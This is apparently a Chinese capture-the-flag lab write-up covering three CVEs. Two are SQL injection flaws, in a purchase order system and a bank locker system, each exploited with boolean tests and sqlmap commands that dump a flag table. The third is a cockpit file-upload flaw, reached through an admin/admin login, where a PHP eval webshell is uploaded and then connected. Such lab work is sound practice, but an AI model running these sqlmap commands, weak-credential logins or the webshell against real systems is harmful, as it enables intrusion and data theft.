shuashuashua

CVE-2023-2130

靶标介绍:

在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。

通过标靶介绍可以知道在/admin/suppliers/view_details.php页面存在参数id有sql注入漏洞,访问该页面

当参数id=1' and 1=1 --+时正确,id=1' and 1=2 --+时错误,说明存在sql注入漏洞。

抓包,把请求信息保存到5.txt文件中,sqlmap梭哈

sqlmap -r 5.txt --batch --dbs

sqlmap -r 5.txt --batch -D purchase_order_db --tables

sqlmap -r 5.txt --batch -D purchase_order_db -T fllllaaaag --columns

sqlmap -r 5.txt --batch -D purchase_order_db -T fllllaaaag -C flag --dump

得到flag

CVE-2023-1313

靶标介绍:

cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装

一个登录界面,他的提升通过/install来运行安装,访问/install,但是重定向到了原登录界面,dirsearch进行目录扫描,

可以看到存在该目录,但是不能够访问,尝试弱口令登录

admin / admin

成功登录进去,

找上传页面

上传一句话木马

<?php phpinfo();@eval($_POST['cmd']);?>

上传成功后下载,浏览后得到上传目录

访问该路径

可以看到配置文件界面,说明上传成功,连接蚁剑

CVE-2023-0562

靶标介绍:

银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

存在mysqli扩展,有数据库,可能存在sql注入,寻找注入点

在这个地方搜索会进行POST传参,然后重定向到该页面

抓包测试

把抓包的内容放到5.txt文件中

searchinput=* *会默认把该参数作为注入点

sqlmap -r 5.txt --batch --dbs

sqlmap -r 5.txt --batch -D blmsdb --tables

sqlmap -r 5.txt --batch -D blmsdb -T fllllaaaag --columns

sqlmap -r 5.txt --batch -D blmsdb -T fllllaaaag -C flag --dump

相关推荐
WhoisXMLAPI1 小时前
WhoisXML API再次荣登2025年美国Inc. 5000快速成长企业榜单
网络·安全
lingggggaaaa5 小时前
小迪安全v2023学习笔记(七十九讲)—— 中间件安全&IIS&Apache&Tomcat&Nginx&CVE
笔记·学习·安全·web安全·网络安全·中间件·apache
无线图像传输研究探索8 小时前
无定位更安全:5G 高清视频终端的保密场景适配之道
5g·安全·音视频·无人机·5g单兵图传·单兵图传·无人机图传
喜欢你,还有大家8 小时前
SSH服务远程安全登录
运维·安全·ssh
爱隐身的官人10 小时前
新后端漏洞(上)- Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
网络·安全·web安全·spel表达式注入命令执行
星马梦缘10 小时前
计算机网络7 第七章 网络安全
网络·计算机网络·安全·web安全·非对称加密·对称加密
weixin_4462608511 小时前
探索网络安全的利器:theHarvester
安全·web安全
m0_7381207212 小时前
CTFshow系列——PHP特性Web97-100
开发语言·安全·web安全·php·ctfshow
Suckerbin12 小时前
Basic Pentesting: 1靶场渗透
笔记·安全·web安全·网络安全
rockmelodies14 小时前
Java安全体系深度研究:技术演进与攻防实践
java·开发语言·安全